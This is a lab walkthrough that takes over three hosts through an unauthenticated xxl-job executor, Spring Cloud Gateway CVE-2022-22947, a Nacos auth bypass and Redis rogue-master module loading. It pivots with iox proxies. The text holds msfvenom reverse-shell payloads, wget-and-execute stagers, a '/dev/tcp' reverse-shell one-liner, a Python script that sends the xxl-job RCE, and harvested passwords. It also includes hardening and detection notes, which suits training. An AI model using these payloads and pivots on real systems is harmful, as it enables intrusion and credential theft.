Tags
xxl-job rce
Spring-Cloud-CVE-2022-22947
nacos auth bypass
iox
The lab is on the easy side: every step is just a matter of running a public exploit.
Topology
Network adapter setup
First, in the Virtual Network Editor, add VMnet1, VMnet2 and VMnet3.
Set the subnet IP for each of the three adapters:
VMnet1: 192.168.100.0
VMnet2: 192.168.88.0
VMnet3: 10.30.7.106 (as given; this is the xxl-job host's own address, and its interface later shows 10.30.7.106/21, so the segment is 10.30.0.0/21)
If a VM refuses to start, edit the fourth line of the <VM name>.vmx file (for example xxl-job.vmx).
Change the xxl-job VM's network adapter from Bridged to VMnet3.
The Kali attack box also needs its adapter changed from Bridged to VMnet3.
Once all targets are up, take a snapshot so you can roll back if anything breaks.
Recon
Port scan of the target 10.30.7.106:
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
8081/tcp open blackice-icecap
9999/tcp open abyss
Ports 8080 and 8081 return 404, and directory brute-forcing finds nothing.
Port 9999 responds with {"code":500,"msg":"invalid request, HttpMethod not support."}
Directory scanning finds nothing there either, so the only information available is that one line: {"code":500,"msg":"invalid request, HttpMethod not support."}
Searching for it points to xxl-job: 9999 is the default port of the xxl-job executor, and this JSON is its reply to a plain GET.
xxl-job
Exploitation
Getting a meterpreter shell
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.30.7.128 LPORT=1234 --platform linux -f elf -o xxl
Serve the payload over a temporary Python HTTP server:
python3 -m http.server 80
Start the listener:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
PAYLOAD => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST eth0
LHOST => eth0
msf6 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf6 exploit(multi/handler) > run
Send the following request with Burp. The executor's /run endpoint accepts a job trigger; with glueType GLUE_SHELL the glueSource field is written to a script and executed by the shell. The request carries no XXL-JOB-ACCESS-TOKEN header and still succeeds, so this executor has no accessToken configured, which is the whole vulnerability here:
POST /run HTTP/1.1
Host: 10.30.7.106:9999
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 393

{"jobId": 1,"executorHandler": "demoJobHandler","executorParams": "demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0,"logId": 1,"logDateTime": 1586629003729,"glueType": "GLUE_SHELL","glueSource": "wget 10.30.7.128/xxl -O /tmp/.xxl;chmod +x /tmp/.xxl;/tmp/.xxl","glueUpdatetime": 1586699003758,"broadcastIndex": 0,"broadcastTotal": 0}
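The same trigger as a script, so it can be reused against other executors and so the fingerprint check from the recon step is explicit. This is an added example, not code from the original writeup or from xxl-job itself; the endpoint, JSON field names and GLUE_SHELL behaviour are those of the request above, and the XXL-JOB-ACCESS-TOKEN header is assumed to be the executor's access-token header (it is only needed when the target has one configured, which this lab does not).

```python
"""Scripted version of the xxl-job executor /run request shown above.

Added example, not code from the original writeup or from xxl-job.
The endpoint (/run), the JSON field names and the GLUE_SHELL semantics are
those of the request above. The XXL-JOB-ACCESS-TOKEN header is assumed to be
the executor's access-token header (xxl-job 2.x); it is only required when
the target has an accessToken configured.
"""
import json
import time
import urllib.request
from typing import Optional


def is_xxl_job_executor(body: str) -> bool:
    """Fingerprint check: the executor answers a GET on its RPC port with this JSON."""
    try:
        data = json.loads(body)
    except ValueError:
        return False
    return data.get("code") == 500 and "HttpMethod not support" in str(data.get("msg", ""))


def build_run_payload(command: str, job_id: int = 1) -> dict:
    """Job trigger body. With glueType GLUE_SHELL the executor writes glueSource
    to a script file and runs it, so `command` is executed by the shell."""
    now_ms = int(time.time() * 1000)
    return {
        "jobId": job_id,
        "executorHandler": "demoJobHandler",
        "executorParams": "",
        "executorBlockStrategy": "COVER_EARLY",
        "executorTimeout": 0,
        "logId": 1,
        "logDateTime": now_ms,
        "glueType": "GLUE_SHELL",
        "glueSource": command,
        "glueUpdatetime": now_ms,
        "broadcastIndex": 0,
        "broadcastTotal": 0,
    }


def build_run_request(base_url: str, command: str,
                      access_token: Optional[str] = None) -> urllib.request.Request:
    """Prepare (but do not send) the POST /run request."""
    body = json.dumps(build_run_payload(command)).encode()
    headers = {"Content-Type": "application/json"}
    if access_token:
        headers["XXL-JOB-ACCESS-TOKEN"] = access_token  # assumed header name, see docstring
    url = base_url.rstrip("/") + "/run"
    return urllib.request.Request(url, data=body, headers=headers, method="POST")


def send_run(base_url: str, command: str, access_token: Optional[str] = None,
             timeout: float = 10.0) -> tuple:
    """Send the trigger and return (HTTP status, response body)."""
    req = build_run_request(base_url, command, access_token)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status, resp.read().decode(errors="replace")


if __name__ == "__main__":
    # Lab values from the writeup: executor on 10.30.7.106:9999, payload served from Kali.
    stager = "wget 10.30.7.128/xxl -O /tmp/.xxl;chmod +x /tmp/.xxl;/tmp/.xxl"
    print(send_run("http://10.30.7.106:9999", stager))
```

If the executor replies with an access-token error instead of running the job, the target has an accessToken set and the request needs the matching header; that setting, plus not exposing port 9999 outside the scheduler's network, is the fix for this issue.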
This gives a shell, and it is running as root:
meterpreter > shell
Process 1572 created.
Channel 1 created.
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:c6:13:b0 brd ff:ff:ff:ff:ff:ff
    inet 10.30.7.106/21 brd 10.30.7.255 scope global ens33
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fec6:13b0/64 scope link
       valid_lft forever preferred_lft forever
3: ens37: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:c6:13:ba brd ff:ff:ff:ff:ff:ff
    inet 192.168.100.20/24 brd 192.168.100.255 scope global ens37
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fec6:13ba/64 scope link
       valid_lft forever preferred_lft forever
whoami
root
The target has two NICs, so there is a second segment (192.168.100.0/24) behind it.
Next, set up a SOCKS proxy and enumerate live hosts on that internal network.
spring-cloud-gateway
Lateral movement
Host discovery
# -W 1 makes ping give up after one second on hosts that do not answer
for k in $( seq 1 255);do ping -c 1 -W 1 192.168.100.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done
Result:
192.168.100.50
SOCKS proxy
1. Start a temporary HTTP server on Kali:
python3 -m http.server 80
2. Start the iox listener on Kali (9991 receives the reverse connection from the target, 1080 becomes the local SOCKS5 port):
./iox proxy -l 9991 -l 1080
3. Download iox to the entry host and connect it back to Kali:
wget 10.30.7.128/iox
chmod +x iox
./iox proxy -r 10.30.7.128:9991 &
The SOCKS proxy is now in place; point proxychains at it (socks5 127.0.0.1 1080 in /etc/proxychains4.conf).
Scan 100.50 with fscan through the proxy; the vulnerability findings:
proxychains4 ./fscan_amd64 -h 192.168.100.50 -socks5 127.0.0.1:1080
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
fscan version: 1.8.2
Socks5Proxy: socks5://127.0.0.1:1080
start infoscan
192.168.100.50:8848 open
192.168.100.50:8800 open
192.168.100.50:22 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle: http://192.168.100.50:8848 code:404 len:431 title:HTTP Status 404 – Not Found
[*] WebTitle: http://192.168.100.50:8800 code:503 len:292 title:None
[+] http://192.168.100.50:8848 poc-yaml-alibaba-nacos
[+] http://192.168.100.50:8848 poc-yaml-alibaba-nacos-v1-auth-bypass
[+] http://192.168.100.50:8800 Spring-Cloud-CVE-2022-22947
[+] http://192.168.100.50:8800 poc-yaml-spring-actuator-heapdump-file
[+] http://192.168.100.50:8800 poc-yaml-springboot-env-unauth spring2
completed 3/3
[*] scan finished, elapsed: 16.92195982s
Exploitation: moving to 100.50
The scan shows that, apart from SSH, 100.50 exposes only two ports, and both carry known vulnerabilities.
A Spring-Cloud-CVE-2022-22947 exploit script is available on GitHub.
Verify:
proxychains4 python3 22947.py http://192.168.100.50:8800
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Usage: python3 CVE-2022-22947.py url
(If you want to get the reverse shell,please input: shell)
Please input your commond: id
---------------------------------------
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.50:8800 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.50:8800 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.50:8800 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.50:8800 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.50:8800 ... OK
The commond result is : Result = 'uid=0(root) gid=0(root) groups=0(root)']
Command execution works and the output is returned.
Next, get a shell.
Getting a meterpreter session via Spring-Cloud-CVE-2022-22947
100.50 cannot reach the 10.30.7.x segment, so the entry host xxl-job must relay the callback, and the payload has to be staged on xxl-job as well.
1. On xxl-job, open a port forward with iox (anything arriving at 192.168.100.20:2211 is relayed to Kali at 10.30.7.128:1235):
./iox fwd -l 2211 -r 10.30.7.128:1235 &
2. Generate the payload, with LHOST set to xxl-job's internal address so that 100.50 can reach it:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.100.20 LPORT=2211 --platform linux -f elf -o springcloud-re-2211
3. Download the payload to the entry host xxl-job and serve it from there on port 1337:
wget 10.30.7.128/springcloud-re-2211
--2023-01-11 06:35:13-- http://10.30.7.128/springcloud-re-2211
Connecting to 10.30.7.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 250 [application/octet-stream]
Saving to: 'springcloud-re-2211'
0K 100% 43.5M=0s
2023-01-11 06:35:13 (43.5 MB/s) - 'springcloud-re-2211' saved [250/250]
python3 -m http.server 1337
exit
meterpreter > bg
[*] Backgrounding session 1...
4. Start the listener on 1235, the port xxl-job forwards to:
msf6 exploit(multi/handler) > set LPORT 1235
LPORT => 1235
msf6 exploit(multi/handler) > run
5. Run the exploit, giving it the staging command in place of a reverse-shell one-liner:
proxychains4 python3 22947.py http://192.168.100.50:8800
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Usage: python3 CVE-2022-22947.py url
(If you want to get the reverse shell,please input: shell)
Please input your commond: shell
---------------------------------------
Please input your commond for reverse shell , such as ("bash -i >& /dev/tcp/192.168.190.177/5000 0>&1"):
wget 192.168.100.20:1337/springcloud-re-2211 -O /tmp/.springcloud-re-2211;chmod +x /tmp/.springcloud-re-2211;/tmp/.springcloud-re-2211
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.50:8800 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.50:8800 ... OK
6. Shell on the springcloud host. The session appears to come from 10.30.7.106 because the xxl-job forwarder is the visible source:
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.30.7.128:1235
[*] Sending stage (3045348 bytes) to 10.30.7.106
[*] Meterpreter session 2 opened (10.30.7.128:1235 -> 10.30.7.106:39446) at 2023-01-11 01:36:09 -0500
meterpreter > shell
Process 2199 created.
Channel 1 created.
whoami && ip a
root
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:8c:96:21 brd ff:ff:ff:ff:ff:ff
    inet 192.168.100.50/24 brd 192.168.100.255 scope global ens33
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fe8c:9621/64 scope link
       valid_lft forever preferred_lft forever
3: ens37: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:8c:96:2b brd ff:ff:ff:ff:ff:ff
    inet 192.168.88.60/24 brd 192.168.88.255 scope global ens37
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fe8c:962b/64 scope link
       valid_lft forever preferred_lft forever
8848: unauthenticated Nacos
fscan also flagged a web application on port 8848 with a public vulnerability.
Exploitation steps
1. Create a user with a POST request via curl:
proxychains4 curl -X POST http://192.168.100.50:8848/nacos/v1/auth/users\?username=test\&password=test
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.100.50:8848 ... OK
{"code":200,"message":"create user ok!","data":null}
2. Log in through the web UI with that account; it works.
Note: the bypass that fscan's poc-yaml-alibaba-nacos-v1-auth-bypass checks for is the one where Nacos treats requests with User-Agent: Nacos-Server as internal and skips authentication. The curl above sets no such header, so in this lab the user-management API is simply reachable without authentication at all. The hardening is the same either way: enable nacos.core.auth.enabled=true, configure a non-default server identity key/value, and keep 8848 off untrusted networks.
In the configuration entries admin-api and redis-task we obtain some credentials:
spring:
  datasource:
    druid:
      url: jdbc:log4jdbc:mysql://127.0.0.1:3306/admin?serverTimezone=Asia/Shanghai&characterEncoding=utf8&useSSL=false
      username: root
      password: Pabc@234%!
  redis:
    host: 0.0.0.0
    password: nbsg@123456
    port: 6379
    databases: 0,1,2,3,4,5,6,7
    timeout: 60000
Third-layer proxy
With 100.50 more or less done, next move on to the 88.x segment.
# -W 1 makes ping give up after one second on hosts that do not answer
for k in $( seq 1 255);do ping -c 1 -W 1 192.168.88.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done
Result: 192.168.88.70
SOCKS proxy
A second iox chain: Kali listens on 9992 (reverse connection) and 10801 (local SOCKS5 port); xxl-job relays 9992 into the 10.30.7.x segment; the springcloud host connects back through that relay. Update /etc/proxychains4.conf to socks5 127.0.0.1 10801 before the next step.
# kali
./iox proxy -l 9992 -l 10801
# xxl-job
./iox fwd -l 9992 -r 10.30.7.128:9992
# springcloud
./iox proxy -r 192.168.100.20:9992
redis
Redis on 88.70, with the password recovered from the Nacos configuration. First attempt with the rogue-master (SLAVEOF + module load) script, telling Redis to replicate from a listener on Kali:
proxychains4 python3 redis-rce.py -r 192.168.88.70 -L 10.30.7.128 -f module.so -a "nbsg@123456"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[*] Connecting to 192.168.88.70:6379...
[proxychains] Strict chain ... 127.0.0.1:10801 ... 192.168.88.70:6379 ... OK
[*] Sending SLAVEOF command to server
[+] Accepted connection from 127.0.0.1:10801
[*] Setting filename
[+] Accepted connection from 127.0.0.1:10801
[*] Start listening on 10.30.7.128:21000
[*] Tring to run payload
[-] Error: timed out, exit
[*] Clean up..
The timeout is expected: the address given to SLAVEOF is dialled by the Redis host itself, and 10.30.7.128:21000 is not reachable from the 88.x segment, so 88.70 never connects to the rogue master. The rogue server must be reachable from 88.70, which means one more relay chain: the springcloud host listens on 192.168.88.60:21000 and forwards to xxl-job at 192.168.100.20:8882, which forwards to Kali at 10.30.7.128:21000.
# spring-cloud-gateway
./iox fwd -l 21000 -r 192.168.100.20:8882
# xxl-job
./iox fwd -l 8882 -r 10.30.7.128:21000
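To make the relay chain concrete, here is a minimal TCP forwarder with the semantics of `iox fwd -l <lport> -r <host>:<port>`, as an added example (it is not iox's own code and not code from the original writeup). Each hop accepts on one side and opens a fresh connection toward the next hop; `relay_roundtrip()` builds the same shape locally, with an echo server standing in for the Kali listener behind two chained relays, so it runs offline. The host names in the stand-alone comment are the lab's.

```python
"""Minimal TCP relay with the semantics of `iox fwd -l <lport> -r <host>:<port>`.

Added example: not iox's code and not code from the original writeup. Each hop
accepts a connection on one side and opens a fresh connection to the next hop,
which is how a callback hitting 192.168.88.60:21000 on the springcloud host is
carried to 192.168.100.20:8882 on xxl-job and on to 10.30.7.128:21000 on Kali.
"""
import socket
import threading


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src -> dst until src hits EOF, then half-close dst so the far
    side sees the EOF too (this is what lets an `exit` propagate along the chain)."""
    try:
        while True:
            chunk = src.recv(65536)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


class Forwarder:
    """Listen on (listen_host, listen_port); relay every accepted connection to remote."""

    def __init__(self, listen_host: str, listen_port: int, remote_host: str, remote_port: int):
        self.remote = (remote_host, remote_port)
        self._srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self._srv.bind((listen_host, listen_port))
        self._srv.listen(16)
        self.port = self._srv.getsockname()[1]  # the real port when listen_port was 0
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def _accept_loop(self) -> None:
        while True:
            try:
                client, _ = self._srv.accept()
            except OSError:  # listener closed
                return
            threading.Thread(target=self._handle, args=(client,), daemon=True).start()

    def _handle(self, client: socket.socket) -> None:
        try:
            upstream = socket.create_connection(self.remote, timeout=5)
        except OSError:
            client.close()  # next hop unreachable: drop the client
            return
        upstream.settimeout(None)
        threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
        _pump(upstream, client)
        client.close()
        upstream.close()

    def close(self) -> None:
        self._srv.close()


def echo_server(host: str = "127.0.0.1") -> tuple:
    """Stand-in for the final listener (the msf handler or the rogue Redis server)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(16)

    def loop() -> None:
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=_pump, args=(conn, conn), daemon=True).start()

    threading.Thread(target=loop, daemon=True).start()
    return srv, srv.getsockname()[1]


def relay_roundtrip(payload: bytes, hops: int = 2) -> bytes:
    """Send payload through `hops` chained forwarders to an echo server; return the echo."""
    srv, port = echo_server()
    forwarders = []
    for _ in range(hops):  # each new hop listens on an ephemeral port and points at the previous one
        fw = Forwarder("127.0.0.1", 0, "127.0.0.1", port)
        forwarders.append(fw)
        port = fw.port
    with socket.create_connection(("127.0.0.1", port), timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        out = b""
        while True:
            chunk = s.recv(65536)
            if not chunk:
                break
            out += chunk
    for fw in forwarders:
        fw.close()
    srv.close()
    return out


if __name__ == "__main__":
    # The xxl-job hop of the chain above would be:
    # Forwarder("192.168.100.20", 8882, "10.30.7.128", 21000); threading.Event().wait()
    print(relay_roundtrip(b"callback from the 88.x segment"))
```

Note what the chain does to the source address: every hop re-originates the connection, which is why the meterpreter session earlier showed up as coming from 10.30.7.106 rather than from 192.168.100.50, and why a rogue Redis server behind such a chain must be told to bind and listen on the Kali side while Redis itself is pointed at the first hop.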
Run redis-rce.py again, now pointing Redis at the first hop, 192.168.88.60:21000, while the script's own listener stays on Kali:
proxychains4 python3 redis-rce.py -r 192.168.88.70 -L 192.168.88.60 -P 21000 -f module.so -a "nbsg@123456"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[*] Connecting to 192.168.88.70:6379...
[proxychains] Strict chain ... 127.0.0.1:10801 ... 192.168.88.70:6379 ... OK
[*] Sending SLAVEOF command to server
[+] Accepted connection from 127.0.0.1:10801
[*] Setting filename
[+] Accepted connection from 127.0.0.1:10801
[*] Start listening on 192.168.88.60:21000
[*] Tring to run payload
[+] Accepted connection from 10.30.7.106:40740
[*] Closing rogue server...
[+] What do u want ? [i]nteractive shell or [r]everse shell or [e]xit: i
[+] Interactive shell open , use "exit" to exit...
$ cat /root/flag
flag{good_redis}
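What redis-rce.py is doing on the wire, as an added example (not the tool's own code and not code from the original writeup): `resp_encode`/`resp_decode` implement Redis RESP framing, `rogue_master_commands()` lists the command sequence behind the "Sending SLAVEOF" and "Setting filename" log lines above, and `reachable_from()` checks the detail that made the first run time out. The addresses, password and module name are the lab's; the command the loaded module exposes for running a shell depends on the module that was built and is not shown here.

```python
"""RESP framing and the rogue-master command sequence used by redis-rce.py.

Added example; not the tool's code and not from the original writeup.
The SLAVEOF address is dialled by the Redis host itself, so it must lie in a
segment that host can reach: 192.168.88.60:21000, not 10.30.7.128:21000.
"""
import ipaddress
from typing import List, Optional, Tuple


class RedisError(Exception):
    """A RESP error reply (e.g. -NOAUTH ...), returned as a value by resp_decode."""


def resp_encode(*args) -> bytes:
    """Encode one command as a RESP array of bulk strings."""
    parts = [b"*%d\r\n" % len(args)]
    for arg in args:
        raw = arg if isinstance(arg, bytes) else str(arg).encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(parts)


def resp_decode(data: bytes):
    """Decode one RESP reply; returns (value, remaining_bytes)."""
    kind, rest = data[:1], data[1:]
    line, _, rest = rest.partition(b"\r\n")
    if kind == b"+":
        return line.decode(), rest
    if kind == b"-":
        return RedisError(line.decode()), rest
    if kind == b":":
        return int(line), rest
    if kind == b"$":
        n = int(line)
        if n < 0:
            return None, rest
        return rest[:n], rest[n + 2:]
    if kind == b"*":
        items = []
        for _ in range(int(line)):
            item, rest = resp_decode(rest)
            items.append(item)
        return items, rest
    raise ValueError("not a RESP reply: %r" % data[:16])


def rogue_master_commands(rogue_host: str, rogue_port: int,
                          password: Optional[str] = None,
                          module: str = "module.so") -> List[Tuple[str, ...]]:
    """Command sequence of the rogue-master technique.

    After CONFIG SET dbfilename, the rogue master answers the victim's SYNC with a
    FULLRESYNC whose RDB payload is the shared object; the victim writes it to
    disk under `module`, and MODULE LOAD turns it into command execution.
    """
    cmds: List[Tuple[str, ...]] = []
    if password:
        cmds.append(("AUTH", password))
    cmds += [
        ("SLAVEOF", rogue_host, str(rogue_port)),
        ("CONFIG", "SET", "dbfilename", module),
        # -- replication handshake happens here, initiated by the victim --
        ("MODULE", "LOAD", "./" + module),
        ("SLAVEOF", "NO", "ONE"),
        ("CONFIG", "SET", "dbfilename", "dump.rdb"),  # put the default name back
    ]
    return cmds


def reachable_from(victim_subnets, rogue_host: str) -> bool:
    """True if rogue_host lies in one of the victim's directly attached subnets."""
    addr = ipaddress.ip_address(rogue_host)
    return any(addr in ipaddress.ip_network(net, strict=False) for net in victim_subnets)


if __name__ == "__main__":
    # Lab values: Redis on 192.168.88.70, password from the Nacos config entry.
    for cmd in rogue_master_commands("192.168.88.60", 21000, password="nbsg@123456"):
        print(resp_encode(*cmd))
    # 88.70 only sits on the 88.x segment, which is why -L 10.30.7.128 timed out:
    print(reachable_from(["192.168.88.0/24"], "10.30.7.128"),
          reachable_from(["192.168.88.0/24"], "192.168.88.60"))
```

The detection angle follows directly from the sequence: a `SLAVEOF` pointing at a host that is not a known replica, `CONFIG SET dbfilename` to a `.so`, and `MODULE LOAD` are each rare enough on a production instance that logging them (or disabling `CONFIG`, `SLAVEOF` and `MODULE` via `rename-command`) shuts this whole class of attack down.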
That completes the lab: root on all three machines.